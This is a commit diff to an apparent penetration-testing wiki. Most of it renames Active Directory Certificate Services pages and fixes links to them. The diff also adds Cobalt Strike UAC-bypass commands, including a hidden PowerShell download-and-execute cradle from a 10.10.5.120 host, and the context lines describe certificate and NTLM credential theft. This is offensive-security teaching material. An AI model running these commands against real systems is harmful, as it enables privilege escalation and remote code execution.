GitBook: [#3451] No subject

SUMMARY.md

@@ -157,10 +157,10 @@
 * [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
   * [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
   * [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
-    * [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md)
-    * [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md)
-    * [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md)
-    * [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md)
+    * [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
+    * [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
+    * [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
+    * [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
   * [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
   * [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
   * [BloodHound](windows-hardening/active-directory-methodology/bloodhound.md)

c2/cobalt-strike.md

@@ -65,6 +65,10 @@ ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
 rev2self # Stop using token generated with make_token
 ## The use of make_token generates event 4624: An account was successfully logged on.  This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
 
+# UAC Bypass
+elevate svc-exe <listener>
+elevate uac-token-duplication <listener>
+runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 
 ## Steal token from pid
 ## Like make_token but stealing the token from a process

windows-hardening/active-directory-methodology/README.md

@@ -281,16 +281,16 @@ Usually users will access the system via RDP, so here you have how to performa c
 
 Gathering certificates from the compromised machine could be a way to escalate privileges inside the environment:
 
-{% content-ref url="ad-certificates/ad-cs-certificate-theft.md" %}
-[ad-cs-certificate-theft.md](ad-certificates/ad-cs-certificate-theft.md)
+{% content-ref url="ad-certificates/certificate-theft.md" %}
+[certificate-theft.md](ad-certificates/certificate-theft.md)
 {% endcontent-ref %}
 
 ### Certificate Templates Abuse
 
 If vulnerable templates are configured it's possible to abuse them to escalate privileges:
 
-{% content-ref url="ad-certificates/ad-cs-domain-escalation.md" %}
-[ad-cs-domain-escalation.md](ad-certificates/ad-cs-domain-escalation.md)
+{% content-ref url="ad-certificates/domain-escalation.md" %}
+[domain-escalation.md](ad-certificates/domain-escalation.md)
 {% endcontent-ref %}
 
 ## Post-exploitation with high privilege account
@@ -352,16 +352,16 @@ These are like golden tickets forged in a way that **bypasses common golden tick
 
 **Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
 
-{% content-ref url="ad-certificates/ad-cs-account-persistence.md" %}
-[ad-cs-account-persistence.md](ad-certificates/ad-cs-account-persistence.md)
+{% content-ref url="ad-certificates/account-persistence.md" %}
+[account-persistence.md](ad-certificates/account-persistence.md)
 {% endcontent-ref %}
 
 ### **Certificates Domain Persistence**
 
 **Using certificates is also possible to persist with high privileges inside the domain:**
 
-{% content-ref url="ad-certificates/ad-cs-domain-persistence.md" %}
-[ad-cs-domain-persistence.md](ad-certificates/ad-cs-domain-persistence.md)
+{% content-ref url="ad-certificates/domain-persistence.md" %}
+[domain-persistence.md](ad-certificates/domain-persistence.md)
 {% endcontent-ref %}
 
 ### AdminSDHolder Group

windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md

@@ -49,7 +49,7 @@ Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass
 ```
 
 {% hint style="warning" %}
-Combined with the technique outlined in the [**THEFT5**](ad-cs-certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the account’s NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
+Combined with the technique outlined in the [**THEFT5**](certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the account’s NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
 This is an alternative method of **long-term credential theft** that does **not touch LSASS** and is possible from a **non-elevated context.**
 {% endhint %}
 
@@ -57,7 +57,7 @@ This is an alternative method of **long-term credential theft** that does **not
 
 If a certificate template allowed for **Domain Computers** as enrolment principals, an attacker could **enrol a compromised system’s machine account**. The default **`Machine`** template matches all those characteristics.
 
-If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](ad-cs-certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
+If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
 
 You can use [**Certify**](https://github.com/GhostPack/Certify) **** to **** gather a certificate for the machine account elevating automatically to SYSTEM with:
 

windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md

@@ -1,4 +1,4 @@
-# Certificate Theft
+# AD CS Certificate Theft
 
 <details>
 

windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md

@@ -263,7 +263,7 @@ The two main rights here are the **`ManageCA`** right and the **`ManageCertifica
 
 #### Abuse
 
-If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](ad-cs-domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
+If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
 
 <figure><img src="../../../.gitbook/assets/image (1) (2) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -390,8 +390,8 @@ Common **problems** with NTLM relay attacks are that the **NTLM sessions are usu
 
 However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
 
-{% content-ref url="ad-cs-account-persistence.md" %}
-[ad-cs-account-persistence.md](ad-cs-account-persistence.md)
+{% content-ref url="account-persistence.md" %}
+[account-persistence.md](account-persistence.md)
 {% endcontent-ref %}
 
 Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:

windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md

@@ -26,7 +26,7 @@ How can you tell that a certificate is a CA certificate?
 * There are **no EKUs**
 
 The built-in GUI supported way to **extract this certificate private key** is with `certsrv.msc` on the CA server.\
-However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](ad-cs-certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
+However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
 
 You can also get the cert and private key using [**certipy**](https://github.com/ly4k/Certipy):
 
@@ -67,7 +67,7 @@ The specified certificate should **work with the previously detailed forgery met
 
 ## Malicious Misconfiguration - DPERSIST3
 
-There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](ad-cs-domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
+There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
 
 * **CA server’s AD computer** object
 * The **CA server’s RPC/DCOM server**